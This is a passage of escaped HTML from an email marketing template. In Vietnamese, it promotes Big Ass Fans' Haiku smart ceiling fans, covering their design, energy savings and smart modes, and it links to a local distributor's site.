<\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 40px 0px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Lato\',sans-serif; color: #c97a14; line-height: 140%; text-align: right; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'Lato\', sans-serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>HAIKU SMART FANS<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 30px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #a5a5a5; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">B\\u1ea1n x\\u1ee9ng \\u0111\\u00e1ng c\\u00f3 m\\u1ed9t chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n l\\u00e0m t\\u0103ng th\\u00eam v\\u1ebb \\u0111\\u1eb9p cho ng\\u00f4i nh\\u00e0 c\\u1ee7a b\\u1ea1n v\\u00e0 l\\u00e0m cho cu\\u1ed9c s\\u1ed1ng c\\u1ee7a b\\u1ea1n tr\\u1edf n\\u00ean \\u0111\\u01a1n gi\\u1ea3n h\\u01a1n. \\u0110\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng b\\u1eb1ng v\\u1eadt li\\u1ec7u cao c\\u1ea5p v\\u00e0 \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf b\\u1eb1ng c\\u00f4ng ngh\\u1ec7 nh\\u00e0 th\\u00f4ng minh ti\\u00ean ti\\u1ebfn, Haiku \\u0111\\u1ea1i di\\u1ec7n cho phong c\\u00e1ch v\\u00e0 s\\u1ef1 \\u0111\\u1ed5i m\\u1edbi \\u0111\\u1ec9nh cao c\\u1ee7a qu\\u1ea1t tr\\u1ea7n. H\\u01a1n 75 gi\\u1ea3i th\\u01b0\\u1edfng qu\\u1ed1c t\\u1ebf ch\\u1ee9ng nh\\u1eadn ch\\u1ea5t l\\u01b0\\u1ee3ng c\\u1ee7a n\\u00f3, trong khi hi\\u1ec7u qu\\u1ea3 h\\u00e0ng \\u0111\\u1ea7u th\\u1ebf gi\\u1edbi khi\\u1ebfn n\\u00f3 tr\\u1edf th\\u00e0nh s\\u1ef1 l\\u1ef1a ch\\u1ecdn ho\\u00e0n h\\u1ea3o cho nh\\u1eefng ch\\u1ee7 nh\\u00e0 quan t\\u00e2m \\u0111\\u1ebfn n\\u0103ng l\\u01b0\\u1ee3ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" style=\\\"height:37px; v-text-anchor:middle; width:114px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#c97a14\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #c97a14; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">Xem th\\u00eam<br \\/><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 40px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"57%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #b6b6b6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296773906-login_customers.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 0px 0px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002000922-vvb.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #cc7202;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #cc7202;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122312096-haiku-logo.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Kh\\u00f4ng c\\u00f3 nh\\u00e0 s\\u1ea3n xu\\u1ea5t qu\\u1ea1t n\\u00e0o n\\u1ed7 l\\u1ef1c t\\u1ea1o ra c\\u00e1c s\\u1ea3n ph\\u1ea9m ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng h\\u01a1n Qu\\u1ea1t Big Ass. \\u0110\\u00f3 l\\u00e0 l\\u00fd do t\\u1ea1i sao c\\u00e1c doanh nghi\\u1ec7p tr\\u00ean to\\u00e0n th\\u1ebf gi\\u1edbi s\\u1eed d\\u1ee5ng qu\\u1ea1t c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 c\\u1eaft gi\\u1ea3m t\\u1edbi 30% chi ph\\u00ed s\\u01b0\\u1edfi \\u1ea5m v\\u00e0 l\\u00e0m m\\u00e1t v\\u00e0 t\\u1ea1i sao c\\u00e1c nh\\u00e0 thi\\u1ebft k\\u1ebf d\\u1ef1a v\\u00e0o c\\u00e1c m\\u1eabu qu\\u1ea1t tr\\u1ea7n \\u0111\\u01b0\\u1ee3c x\\u1ebfp h\\u1ea1ng ENERGY STAR\\u00ae c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 \\u0111\\u00e1p \\u1ee9ng nhu c\\u1ea7u ng\\u00e0y c\\u00e0ng t\\u0103ng \\u0111\\u1ed1i v\\u1edbi c\\u00e1c d\\u1ef1 \\u00e1n b\\u1ec1n v\\u1eefng, \\u0111\\u01b0\\u1ee3c ch\\u1ee9ng nh\\u1eadn LEED.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 0px 40px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002319908-vvb2.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>QU\\u1ea0T TR\\u1ea6N TH\\u00d4NG MINH, C\\u00c1C CH\\u1ebe \\u0110\\u1ed8 TH\\u00d4NG MINH<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"line-height: 150%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 150%;\\\">Haiku c\\u00f3 th\\u1ec3 b\\u1eaft ch\\u01b0\\u1edbc m\\u1ed9t l\\u00e0n gi\\u00f3 nh\\u1eb9, ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng, \\u0111i\\u1ec1u ch\\u1ec9nh \\u0111\\u1ec3 c\\u00f3 gi\\u1ea5c ng\\u1ee7 t\\u1ed1i \\u01b0u v\\u00e0 ch\\u1ea1y tr\\u00ean \\u0111\\u1ed3ng h\\u1ed3 b\\u1ea5m gi\\u1edd\\u2014t\\u1ea5t c\\u1ea3 th\\u00f4ng qua \\u0111i\\u1ec1u khi\\u1ec3n t\\u1eeb xa \\u0111i k\\u00e8m ho\\u1eb7c \\u1ee9ng d\\u1ee5ng di \\u0111\\u1ed9ng Haiku c\\u1ee7a Big Ass Fans.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      